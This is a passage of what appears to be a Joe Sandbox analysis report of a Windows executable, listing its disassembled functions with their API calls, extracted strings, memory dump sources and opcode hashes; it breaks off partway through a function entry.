                  • Opcode ID: 67e8f2bfc3efdbffa9c7e3dfbc3e4c15a22f37dd4439a97d9055aaa987e6872b
                  • Instruction ID: 4fefaf874e48d477ad07891cd358d90355e2409dc64e1b8440a4ec7e753c2cf6
                  • Opcode Fuzzy Hash: 67e8f2bfc3efdbffa9c7e3dfbc3e4c15a22f37dd4439a97d9055aaa987e6872b
                  • Instruction Fuzzy Hash: A5A012D516C2027C300C31427C02C3A031CC1C0B50330450AB006800C5574009051D31
                  Function 0018DAE8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DAB2
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 9dc8326376e296a9edf2b2bd80be710effcb5556f6304526bf7159fbf1dde725
                  • Instruction ID: 4fefaf874e48d477ad07891cd358d90355e2409dc64e1b8440a4ec7e753c2cf6
                  • Opcode Fuzzy Hash: 9dc8326376e296a9edf2b2bd80be710effcb5556f6304526bf7159fbf1dde725
                  • Instruction Fuzzy Hash: A5A012D516C2027C300C31427C02C3A031CC1C0B50330450AB006800C5574009051D31
                  Function 0018DBF7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DBD5
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: e7b3ecc86127dded1d53ba2f743de3751fdaf9fd8ef3fdbe76008584c0c5876a
                  • Instruction ID: d1c92f3b8e989d4f4a60637884299e7542dd54c8fc4b0db0ee8050d46590efc5
                  • Opcode Fuzzy Hash: e7b3ecc86127dded1d53ba2f743de3751fdaf9fd8ef3fdbe76008584c0c5876a
                  • Instruction Fuzzy Hash: 67A011AA2AC282BC300C32003C0BC3A032CC2C2B20332880AF20B800C2AB800E0A2A30
                  Function 0018DC1F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DBD5
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: c78fbd900382b970801504f6ef2c2cf060511bb478edc7c0970ecf88383f774f
                  • Instruction ID: d1c92f3b8e989d4f4a60637884299e7542dd54c8fc4b0db0ee8050d46590efc5
                  • Opcode Fuzzy Hash: c78fbd900382b970801504f6ef2c2cf060511bb478edc7c0970ecf88383f774f
                  • Instruction Fuzzy Hash: 67A011AA2AC282BC300C32003C0BC3A032CC2C2B20332880AF20B800C2AB800E0A2A30
                  Function 0018DC15 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DBD5
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 4d82e7e9496bf180e55b4f0c0e6a77d353787af3dcc0966604a5706cc35163ed
                  • Instruction ID: d1c92f3b8e989d4f4a60637884299e7542dd54c8fc4b0db0ee8050d46590efc5
                  • Opcode Fuzzy Hash: 4d82e7e9496bf180e55b4f0c0e6a77d353787af3dcc0966604a5706cc35163ed
                  • Instruction Fuzzy Hash: 67A011AA2AC282BC300C32003C0BC3A032CC2C2B20332880AF20B800C2AB800E0A2A30
                  Function 0018DC0B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DBD5
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 12f130f6036c00a2e401406704dd1ebaa129c0975031796741efdb2916815684
                  • Instruction ID: d1c92f3b8e989d4f4a60637884299e7542dd54c8fc4b0db0ee8050d46590efc5
                  • Opcode Fuzzy Hash: 12f130f6036c00a2e401406704dd1ebaa129c0975031796741efdb2916815684
                  • Instruction Fuzzy Hash: 67A011AA2AC282BC300C32003C0BC3A032CC2C2B20332880AF20B800C2AB800E0A2A30
                  Function 0018DC4E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DC36
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 70fec00c8b503f99a551b7e8aac3861ed50acb45a4773cc4787c50b34f27d21b
                  • Instruction ID: e54350f6981f58362ab47d4faa13964d53d49001ab41cf4925bb406d75421042
                  • Opcode Fuzzy Hash: 70fec00c8b503f99a551b7e8aac3861ed50acb45a4773cc4787c50b34f27d21b
                  • Instruction Fuzzy Hash: E2A011AA2AC302BC300C32003C22C3A032CC2C0B20330880EF20EA00C2AB802E0AAA30
                  Function 0018DC44 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                  Download Yara Rule
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DC36
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: aa82b0d48afbbe34af7db4149203aa7774e545e48369e326735ab83e5d54c351
                  • Instruction ID: e54350f6981f58362ab47d4faa13964d53d49001ab41cf4925bb406d75421042
                  • Opcode Fuzzy Hash: aa82b0d48afbbe34af7db4149203aa7774e545e48369e326735ab83e5d54c351
                  • Instruction Fuzzy Hash: E2A011AA2AC302BC300C32003C22C3A032CC2C0B20330880EF20EA00C2AB802E0AAA30
                  Function 00179EBF Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                  Download Yara Rule
                  APIs
                  • SetEndOfFile.KERNELBASE(?,00179104,?,?,-00001964), ref: 00179EC2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: File
                  • String ID:
                  • API String ID: 749574446-0
                  • Opcode ID: 8d2d535a7e813cbaf1e61cbcafb1d34c59c4bf3795039bfba5adedb915eed605
                  • Instruction ID: d5e6fa55e61708fc44f2d3df078067edba4ae460c9b9ac7cec5fc375df2ac697
                  • Opcode Fuzzy Hash: 8d2d535a7e813cbaf1e61cbcafb1d34c59c4bf3795039bfba5adedb915eed605
                  • Instruction Fuzzy Hash: 6CB011300A000A8A8E002B30CE08A28BA20EB2230A30082A0B022CA0A0CB22C002AA00
                  Function 0018A322 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                  Download Yara Rule
                  APIs
                  • SetCurrentDirectoryW.KERNELBASE(?,0018A587,C:\Users\user\Desktop,00000000,001B946A,00000006), ref: 0018A326
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: CurrentDirectory
                  • String ID:
                  • API String ID: 1611563598-0
                  • Opcode ID: 14512f154c16b19f3552712ddc3c0099b6e5bd9d3ebb60ccf4e72e33324c41e1
                  • Instruction ID: c56b981ec2622cc884e3de746246c8ab94a4c9c4548b09be41207be2270a95f6
                  • Opcode Fuzzy Hash: 14512f154c16b19f3552712ddc3c0099b6e5bd9d3ebb60ccf4e72e33324c41e1
                  • Instruction Fuzzy Hash: 94A01230194006568A000B30CC09C1576509761702F0086207002C00A0CB308854A500
                  Function 001796D0 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                  Download Yara Rule
                  APIs
                  • CloseHandle.KERNELBASE(000000FF,?,?,0017968F,?,?,?,?,001A1FA1,000000FF), ref: 001796EB
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: CloseHandle
                  • String ID:
                  • API String ID: 2962429428-0
                  • Opcode ID: c6e39b30b4fc9fb33fa02e12561fd217e6217e9231521a2726e456b2ea129717
                  • Instruction ID: fd1a55cee8d51f4fbfbe7bdb16688295004c55de4aedd9c31119c71c89944bb7
                  • Opcode Fuzzy Hash: c6e39b30b4fc9fb33fa02e12561fd217e6217e9231521a2726e456b2ea129717
                  • Instruction Fuzzy Hash: BBF05E70596B048FDB308A24D648792B7F59B16725F04DB1EE0FB438A09761A88D8F10

                  Non-executed Functions

                  Function 0018B8E0 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0017130B: GetDlgItem.USER32(00000000,00003021), ref: 0017134F
                    • Part of subcall function 0017130B: SetWindowTextW.USER32(00000000,001A35B4), ref: 00171365
                  • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0018B971
                  • EndDialog.USER32(?,00000006), ref: 0018B984
                  • GetDlgItem.USER32(?,0000006C), ref: 0018B9A0
                  • SetFocus.USER32(00000000), ref: 0018B9A7
                  • SetDlgItemTextW.USER32(?,00000065,?), ref: 0018B9E1
                  • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0018BA18
                  • FindFirstFileW.KERNEL32(?,?), ref: 0018BA2E
                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0018BA4C
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0018BA5C
                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0018BA78
                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0018BA94
                  • _swprintf.LIBCMT ref: 0018BAC4
                    • Part of subcall function 0017400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0017401D
                  • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0018BAD7
                  • FindClose.KERNEL32(00000000), ref: 0018BADE
                  • _swprintf.LIBCMT ref: 0018BB37
                  • SetDlgItemTextW.USER32(?,00000068,?), ref: 0018BB4A
                  • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0018BB67
                  • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0018BB87
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0018BB97
                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0018BBB1
                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0018BBC9
                  • _swprintf.LIBCMT ref: 0018BBF5
                  • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0018BC08
                  • _swprintf.LIBCMT ref: 0018BC5C
                  • SetDlgItemTextW.USER32(?,00000069,?), ref: 0018BC6F
                    • Part of subcall function 0018A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0018A662
                    • Part of subcall function 0018A63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,001AE600,?,?), ref: 0018A6B1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                  • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                  • API String ID: 797121971-1840816070
                  • Opcode ID: 4d2a78953e25b04dacfc49fd8c12a0a3d0ae8ec3e9246da508086a12426145df
                  • Instruction ID: 387954a5bde8f0731c95013786cfca3e4e0528861716cbfab9363b463aac5705
                  • Opcode Fuzzy Hash: 4d2a78953e25b04dacfc49fd8c12a0a3d0ae8ec3e9246da508086a12426145df
                  • Instruction Fuzzy Hash: A591A4B2648348BBD231ABA0DC89FFBB7ACEB4A704F004819F749D2491D77196448B72
                  Function 0017718C Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 296fileCOMMON
                  Download Yara Rule
                  APIs
                  • __EH_prolog.LIBCMT ref: 00177191
                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 001772F1
                  • CloseHandle.KERNEL32(00000000), ref: 00177301
                    • Part of subcall function 00177BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00177C04
                    • Part of subcall function 00177BF5: GetLastError.KERNEL32 ref: 00177C4A
                    • Part of subcall function 00177BF5: CloseHandle.KERNEL32(?), ref: 00177C59
                  • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 0017730C
                  • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 0017741A
                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00177446
                  • CloseHandle.KERNEL32(?), ref: 00177457
                  • GetLastError.KERNEL32 ref: 00177467
                  • RemoveDirectoryW.KERNEL32(?), ref: 001774B3
                  • DeleteFileW.KERNEL32(?), ref: 001774DB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                  • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                  • API String ID: 3935142422-3508440684
                  • Opcode ID: 1e0ec52cb3216042e5db7d1f2a46e9f5e136cd0d4b922619c56a781b96cf6523
                  • Instruction ID: 5fc64331038df3d414c83248bdfaf058a9132c7f7162b5b31f30fd25fec09c0c
                  • Opcode Fuzzy Hash: 1e0ec52cb3216042e5db7d1f2a46e9f5e136cd0d4b922619c56a781b96cf6523
                  • Instruction Fuzzy Hash: 5EB11371904214ABDF21DFA4DC81BFEB7B8BF15300F0085A9F95AE7182D734AA49CB60
                  Function 00173281 Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 608COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: H_prolog_memcmp
                  • String ID: CMT$h%u$hc%u
                  • API String ID: 3004599000-3282847064
                  • Opcode ID: c662446524682321061a7d94b69b1683aa207640f0fd23e052d15077fae7c1cc
                  • Instruction ID: 6cd3a60a6d1eb14ae031d1fc85888c1e3a998ad40d0569d8b666c454bf9876e7
                  • Opcode Fuzzy Hash: c662446524682321061a7d94b69b1683aa207640f0fd23e052d15077fae7c1cc
                  • Instruction Fuzzy Hash: 0232C3715102849FDF15DF64C886AEA37B5AF24300F04847EFD9ECB282DB70AA49DB60
                  Function 0019D00E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: __floor_pentium4
                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                  • API String ID: 4168288129-2761157908
                  • Opcode ID: e2ceab890dc9cd15b2282363af9abd7630d7247f57fc503bb11d9b6d3b0b5e18
                  • Instruction ID: d80d71ec9b67a8f956a4bdf63932a8ec3890ec86d5e774e90eefb9c129eb17b4
                  • Opcode Fuzzy Hash: e2ceab890dc9cd15b2282363af9abd7630d7247f57fc503bb11d9b6d3b0b5e18
                  • Instruction Fuzzy Hash: D3C22972E086288FDF29CE28ED407E9B7B5EB45315F1541EAD84EE7240E775AE818F40
                  Function 001727E8 Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 794COMMON
                  Download Yara Rule
                  APIs
                  • __EH_prolog.LIBCMT ref: 001727F1
                  • _strlen.LIBCMT ref: 00172D7F
                    • Part of subcall function 0018137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0017B652,00000000,?,?,?,00010484), ref: 00181396
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00172EE0
                  Strings
                  Memory Dump Source
